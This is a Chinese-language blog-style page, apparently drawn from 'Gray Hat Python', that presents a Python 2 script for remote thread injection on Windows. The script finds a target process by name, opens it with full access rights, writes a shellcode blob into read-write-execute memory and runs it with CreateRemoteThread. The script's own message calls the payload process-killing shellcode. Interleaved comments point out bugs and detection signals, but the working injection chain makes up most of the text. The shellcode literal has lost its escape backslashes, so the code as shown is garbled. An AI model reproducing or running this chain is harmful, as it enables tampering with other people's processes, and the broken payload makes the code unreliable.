概述
用python来实现远程线程注入,该例子是测试相关工作的。参数为要注入的进程的名字:
import sys
import ctypes
from ctypes import *
# Win32 constants used by the calls below (values as given on this page).
PAGE_EXECUTE_READWRITE = 0x00000040   # page protection: readable, writable AND executable
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )   # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF: the broadest handle rights
VIRTUAL_MEM = ( 0x1000 | 0x2000 )   # MEM_COMMIT | MEM_RESERVE, passed to VirtualAllocEx
kernel32 = windll.kernel32   # `windll` comes from the `from ctypes import *` above
# Target process name taken from the command line.
# NOTE: sys.argv[1] is indexed here, BEFORE the guard on the next line, so running
# the script with no argument raises IndexError instead of printing the usage text
# (the guard also tests the argument's truthiness, not the argument count).
pName = sys.argv[1]
if not sys.argv[1]:
    print "Code Injector: ./code_injector.py <name to inject>"   # Python 2 print statement
    sys.exit(0)
# Raw payload bytes that get copied into the target process; a later message in this
# script describes it as process-killing shellcode.  The literal is kept exactly as it
# appears on this page.  Only its length is used below, to size the remote allocation
# and the cross-process write.
shellcode =
"x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
"x49x0bx31xc0x51x50xffxd7";
code_size = len(shellcode)   # byte count for VirtualAllocEx and WriteProcessMemory
TH32CS_SNAPPROCESS = 0x00000002   # CreateToolhelp32Snapshot flag: include the process list in the snapshot
class PROCESSENTRY32(ctypes.Structure):
    """ctypes mirror of the Win32 PROCESSENTRY32 record filled by Process32First/Process32Next.

    Every field is declared as c_ulong here, as on the page.  The caller must set
    dwSize to ctypes.sizeof(PROCESSENTRY32) before the first Process32First call;
    szExeFile (a fixed 260-byte buffer) is the executable name that getProcPid
    compares against the requested process name, and th32ProcessID is the value
    it returns.
    """
    _fields_ = [("dwSize", ctypes.c_ulong),   # must hold sizeof(PROCESSENTRY32) on input
                ("cntUsage", ctypes.c_ulong),
                ("th32ProcessID", ctypes.c_ulong),   # PID returned by getProcPid
                ("th32DefaultHeapID", ctypes.c_ulong),
                ("th32ModuleID", ctypes.c_ulong),
                ("cntThreads", ctypes.c_ulong),
                ("th32ParentProcessID", ctypes.c_ulong),
                ("pcPriClassBase", ctypes.c_ulong),
                ("dwFlags", ctypes.c_ulong),
                ("szExeFile", ctypes.c_char * 260)]   # executable file name, 260-byte fixed buffer
def getProcPid(procName):
    """Return the th32ProcessID of the first running process whose szExeFile equals procName.

    Walks a Toolhelp process snapshot with Process32First/Process32Next.  The name
    comparison is a plain `==`, so it is exact and case-sensitive.  Returns None
    (implicitly) when Process32First fails or when no entry matches.

    NOTE: on the Process32First-failure path the function returns without calling
    CloseHandle, so the snapshot handle leaks on that path only.
    """
    CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
    Process32First = ctypes.windll.kernel32.Process32First
    Process32Next = ctypes.windll.kernel32.Process32Next
    CloseHandle = ctypes.windll.kernel32.CloseHandle
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)   # return value is not checked for INVALID_HANDLE_VALUE
    pe32 = PROCESSENTRY32()
    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)   # required by the Toolhelp API before the first call
    if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:
        return   # snapshot handle is NOT closed on this path
    if pe32.szExeFile == procName:
        CloseHandle(hProcessSnap)
        return pe32.th32ProcessID
    while True:
        #yield pe32 #save the pe32
        if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:
            break   # end of snapshot (or an error): fall through to the cleanup below
        if pe32.szExeFile == procName:
            CloseHandle(hProcessSnap)
            return pe32.th32ProcessID
    CloseHandle(hProcessSnap)   # no match: close the snapshot and return None
procPid = getProcPid(pName)   # None when no process named pName was found; not checked before use
print procPid
# Get a handle to the process we are injecting into.
# Defender note: a cross-process OpenProcess requesting PROCESS_ALL_ACCESS is exactly
# what process-access telemetry (e.g. Sysmon Event ID 10) records for this technique.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )
if not h_process:
    # BUG: `pid` is never defined in this script (the lookup result is `procPid`),
    # so this error path raises NameError before the message is printed.
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)
# Allocate some space for the shellcode.
# The returned address (0 on failure) is not checked.  An RWX region committed in a
# foreign process is the canonical artifact that memory scanners flag.
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write out the shellcode.  `written` receives the byte count, but neither it nor the
# BOOL return value is inspected, so a failed or partial write goes unnoticed.
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))
# Now we create the remote thread and point its entry routine
# at the head of our shellcode.  The thread handle returned by CreateRemoteThread
# is discarded and h_process is never closed.
# Defender note: a remote thread created in another process is logged as
# Sysmon Event ID 8 and is the classic detection signal for this API chain.
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):
    print "[*] Failed to inject process-killing shellcode. Exiting."
    sys.exit(0)
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
参考:
1. python 灰帽子
2. http://blog.csdn.net/chollima/article/details/7669522
3. http://www.exploit-db.com/exploits/28996/